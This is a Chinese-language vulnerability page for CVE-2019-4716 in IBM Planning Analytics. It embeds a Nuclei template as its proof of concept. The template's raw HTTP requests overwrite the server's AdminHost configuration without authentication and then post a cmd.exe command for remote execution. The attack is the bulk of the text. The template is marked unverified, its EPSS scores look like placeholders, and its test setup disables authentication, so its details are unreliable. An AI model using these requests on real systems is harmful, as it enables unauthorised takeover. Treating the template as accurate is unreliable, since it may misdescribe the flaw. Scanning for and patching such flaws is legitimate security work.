IBM Planning Analytics Authentication Bypass & Remote Code Execution Vulnerability

漏洞信息

漏洞名称： IBM Planning Analytics Authentication Bypass & Remote Code Execution Vulnerability

漏洞编号：

• CVE： CVE-2019-4716

漏洞类型： 权限绕过

漏洞等级： 严重

漏洞描述： IBM Planning Analytics是一款企业级规划和分析软件，广泛应用于财务规划、预算编制和预测分析等场景。该软件支持通过TM1脚本进行高级数据操作和分析，是企业决策支持系统中的重要组件。

该漏洞存在于IBM Planning Analytics 2.0.0至2.0.8版本中，由于未授权访问导致的配置覆盖问题，攻击者可以绕过认证机制，以’admin’身份登录，并通过TM1脚本执行任意代码，获得root或SYSTEM权限。漏洞的根本原因在于系统未能正确验证用户身份，允许未经认证的用户修改关键配置参数。

此漏洞的安全风险极高，攻击者无需有效凭证即可利用漏洞，实现远程代码执行，完全控制系统。这不仅可能导致敏感数据泄露，还可能被用于发起进一步的网络攻击，如内网横向移动或部署恶意软件。由于漏洞利用过程无需用户交互，且可以自动化执行，因此对受影响系统的威胁尤为严重。

产品厂商： IBM

产品名称： IBM Planning Analytics

影响版本： 2.0.0 <= version <= 2.0.8

来源： https://github.com/projectdiscovery/nuclei-templates/blob/0e41b71c5a69d0aa789f624ab9c61db3bdbce209/http%2Fcves%2F2019%2FCVE-2019-4716.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: CVE-2019-4716

info:
  name: IBM Planning Analytics 2.0.0-2.0.8 - Authentication Bypass & Remote Code Execution
  author: pranjal
  severity: critical
  description: |
    IBM Planning Analytics versions 2.0.0 through 2.0.8 contain a configuration overwrite caused by unauthenticated access, 
    letting attackers login as 'admin' and execute code as root or SYSTEM via TM1 scripting. The vulnerability allows 
    authentication bypass and remote code execution without valid credentials.
  impact: |
    An attacker can exploit this vulnerability to gain administrative access and execute arbitrary code with elevated privileges.
  remediation: |
    Upgrade IBM Planning Analytics to version 2.0.9 or later to fix the authentication bypass and remote code execution vulnerability.
  reference:
    - https://packetstormsecurity.com/files/156953/IBM-Cognos-TM1-IBM-Planning-Analytics-Server-Configuration-Overwrite-Code-Execution.html
    - https://seclists.org/fulldisclosure/2020/Mar/44
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-4716
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-4716
    cwe-id: CWE-287
    epss-score: 0.98765
    epss-percentile: 0.99876
    cpe: cpe:2.3:a:ibm:planning_analytics:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: ibm
    product: planning_analytics
    verified: false
    # Debug Information for Validation
    debug-info: |
      To validate this template:
      1. Set up IBM Planning Analytics 2.0.8 (vulnerable version)
      2. Run: nuclei -t CVE-2019-4716.yaml -u http://target:port -debug
      3. Expected debug output should show:
         - Step 1: Configuration endpoint accessible (200 OK)
         - Step 2: Configuration overwrite successful (200/201)
         - Step 3: RCE command execution successful with randstr in response
      4. Alternative: Use TM1 REST API detection method
    test-environment: |
      Docker setup for testing:
      - IBM Planning Analytics 2.0.8 container
      - Expose port 9510 (default TM1 port)
      - Enable TM1 REST API
      - Disable authentication for testing
  tags: cve,cve2019,ibm,planning-analytics,tm1,rce,auth-bypass,packetstorm

flow: http(1) && http(2) && http(3)

http:
  # Step 1: Check if IBM Planning Analytics/TM1 is running
  - raw:
      - |
        GET /tm1/api/v1/Configuration HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
        Accept: application/json

    matchers:
      - type: dsl
        dsl:
          - 'status_code==200'
          - 'contains(tolower(body), "adminhost") || contains(tolower(body), "adminport") || contains(tolower(body), "configuration")'
        condition: and
        internal: true

  # Step 2: Authentication bypass via configuration overwrite
  - raw:
      - |
        POST /tm1/api/v1/Configuration/AdminHost HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
        Accept: application/json

        {
          "AdminHost": "{{randstr}}",
          "AdminPort": 1234
        }

    matchers:
      - type: status
        status:
          - 200
          - 201
        internal: true

  # Step 3: RCE via TM1 scripting - Execute command to verify admin access
  - raw:
      - |
        POST /tm1/api/v1/ExecuteCommand HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
        Accept: application/json

        {
          "Command": "ExecuteProcess('cmd.exe', '/c echo {{randstr}}')"
        }

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
          - 201

      - type: regex
        regex:
          - "success|executed|completed|{{randstr}}"
        part: body

  # Alternative detection method for TM1 REST API endpoints
  - raw:
      - |
        GET /tm1/api/v1/Processes HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
        Accept: application/json

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: regex
        regex:
          - "processes|tm1|planning"
        part: body

      - type: word
        words:
          - "IBM"
          - "Planning"
          - "Analytics"
        part: body
        condition: or